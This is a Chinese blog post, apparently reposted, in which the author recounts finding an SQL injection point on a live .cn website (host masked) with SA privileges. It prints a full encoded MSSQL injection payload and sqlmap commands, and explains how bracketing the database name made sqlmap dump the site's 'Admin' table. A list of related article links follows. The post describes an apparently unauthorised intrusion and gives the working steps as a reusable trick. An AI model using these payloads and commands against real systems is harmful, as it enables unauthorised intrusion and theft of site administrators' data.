某日偶遇一SQLInjection Point,MSSQL 2008,已开启显错模式。
马上扔进SQLMap跑,一路顺畅,竟然还是SA的权限,心想运气真好,无论如何都拿定了。
数据库,表,列都列出来了,但是上–dump参数就死活跑不出来。
报错 “unable to retrieve the number of entries for table ‘Admin’ in database ‘2012_xxxx’”——x是马赛克哈:)
心想应该很容易搞定,遂查找手工注入方法,测试无果。
还是回到SQLMap,-h查看帮助,发现-v 参数可以指定输出详细度,开到-v 3,发现显示了payload,一不做二不休,直接开到-v 5,发现提供了整个http请求,怪不得报错,原来都是返回500,用firefox打开完整payload,说是语法错误。

Xhttp://www.xxxx.cn/xxx/detail.aspx?id=218%20AND%204416%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28115%29%2BCHAR%28119%29%2BCHAR%28100%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28*%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%222012_xxxx%22..syscolumns%2C2012_xxxx..sysobjects%20WHERE%202012_xxxx..syscolumns.id%3D2012_xxxx..sysobjects.id%20AND%202012_xxxx..sysobjects.name%3DCHAR%2884%29%2BCHAR%2866%29%2BCHAR%2895%29%2BCHAR%2865%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28104%29%2BCHAR%28113%29%29%29

显然是2012的问题,也就是应该是错把库名中的数字错当成参数了

在URL的库名加上双引号包裹,果然就可以爆出数据了。

问题又来了,要我手工爆数据我可搞不定,还是要回到SQLMap啊,意思是要想办法把库名包裹起来,不让系统把它解析成一个参数

XTEST1: ./sqlmap.py -u http://www.xxxx.cn/xxxx/detail.aspx?id=218 –dump -D”‘2012_xxxx” -T’Admin’

这次好一点了,还是报错unable to retrieve column names for table ‘Admin’ in database ‘”2012_xxxx”‘,意思是有返回了,但是库名不对。

XTEST12 ./sqlmap.py -u http://www.xxxx.cn/broadband/detail.aspx?id=218  –dump -D”[2012_xxxx]” -T’Admin’

我也不记得哪来的灵机一动,改用中括号包裹,果然就成功了,dump出整个表了。

XCONCLUSION:在使用SQLMap时可以使用-v参数指定输出详细度,然后直接用浏览器查看payload,确定语法错误点后想办法改进。在遇到系统误判库名表名是可用中括号包裹名字。

转载于:https://www.cnblogs.com/milantgh/p/4908812.html

sqlmap注入检测经验0x01相关推荐

  1. SQLMAP注入教程-11种常见SQLMAP使用方法

    一.SQLMAP用于Access数据库注入 (1)猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.a ...

  2. 用户领域 API 监控和代码注入检测

    原文地址:Userland API Monitoring and Code Injection Detection 原文作者:dtm 译文出自:掘金翻译计划 本文永久链接:github.com/xit ...

  3. C#SQL注入检测——特别是对于旧版.NET代码

    目录 使用Decorator模式提供添加SQL注入检测的位置 SQL注入检测代码 究竟如何检测到SQL注入? SQLExtensions类中包含的格式化方法 自定义.NET异常类 用于检测SQL注入的 ...

  4. 利用sqlmap注入获取网址管理员账号密码

    1.跨站脚本 原理:指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料.利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式. ( ...

  5. 基于AST抽象语法树的SQL注入检测 (2) -- 每周小结(01-02~01-08) - .Little Hann

    本周继续学习AST的SQL语法检测原理的学习,文章的接下来部分准备分为2部分进行学习: 1. SQL注入语法防御规则 2. druid中SQL注入防御模块sql-wall 1. 相关学习资料 http ...

  6. sqlmap注入——POST检测点方法

    目录 一.题目 二.解题过程 1. 在输入框输入`'`号,发现有错误提示,说明存在sql注入 2. 判断注入方式 3. sqlmap注入--POST检测点 4.sqlmap注入获取数据库信息 5.查看 ...

  7. SQLmap注入教程

    一次sqlmap注入点并且dump出账号密码全程 判断注入点:sqlmap.py -u "存在注入url" 爆出所有数据库名字:sqlmap.py -u "存在注入url ...

  8. php安全检测软件,SQL注入PHP注入检测工具下载

    如果你是一名网站管理员或者服务器管理员,你需要关心的是网站的安全问题,为了方便大家测试,极速小编为你介绍一款功能强大的网站安全测试工具--微粒明小子旁注,它可以对网站进行旁注检测.SQL注入检测.PH ...

  9. SQL注入检测模块开源项目DRUID-SQL-WALL学习小结

    作为sql注入原理.sql注入检测.防御系列学习的第三篇.本文主要关注了抽象语法树ast在sql注入检测上的应用开发.以及开源项目druid-sql-wall的学习,希望能给研究这一领域的朋友带来一点 ...

最新文章

  1. 棱形旋转c语言程序_C 语言时隔 5 年重回巅峰,这 20 个热门项目拿去练手!
  2. Face++印奇:从无人问津到融资4.6亿美金|纪录影片
  3. thinkphp mysql批量入库_ThinkPHP3.2框架使用addAll()批量插入数据的方法
  4. iOS 正确选择图片加载方式
  5. 计算机网络讨论4,计算机网络实验四
  6. 利用联合双边滤波或引导滤波进行升采样(Upsampling)技术提高一些耗时算法的速度。...
  7. Typora一次编辑,知乎、CSDN等多平台快速发布:Typora + PicGo + 图床
  8. v-if 的区别v-show
  9. Go程序:演示数组切片用法
  10. java延迟队列,java高级面试笔试题
  11. 两年,从月入4K到40K,从来不是努力工作,而是不断跳槽
  12. java可以做苹果软件吗_Java应用软件iPhone上运行 苹果没兴趣Sun单干
  13. robot frame基础知识--变量
  14. C# IEnumerator与 IEnumerable(2) 托管使用
  15. NET Framework安装不成功解决办法
  16. 7号信令基本概念和术语
  17. 基于哈夫曼编码的文件压缩
  18. php实现logo的上传,PHP实现图片的等比缩放和Logo水印功能示例
  19. linux清理tmp垃圾文件夹,Linux tmp目录自动清理总结
  20. TEACH_NLP——开篇

热门文章

  1. uni app map 地图 漂浮问题及方案
  2. Qt笔记-解决QSocketNotifier: Multiple socket notifiers for same socket xxx and type Read问题
  3. canvas笔记-二次贝塞尔曲线与三次贝塞尔曲线的用法
  4. Qt工作笔记-使用QCustomplot实现鼠标拖动数据点画曲线
  5. Qt学习笔记-Qt Graphic View Framework
  6. MySQL入门之大纲
  7. 2021广西蒙山中学高考成绩查询,广西省蒙山中学2020-2021学年高二下学第一次月考数学(文)试题及答案.doc...
  8. docker es持久化_Docker 搭建 ES 集群并整合 Spring Boot
  9. html上拉下拉查看文字内容,html5上拉下拉事件效果演示
  10. 日志写入hbase_千亿级日志系统设计思路,牛人必学!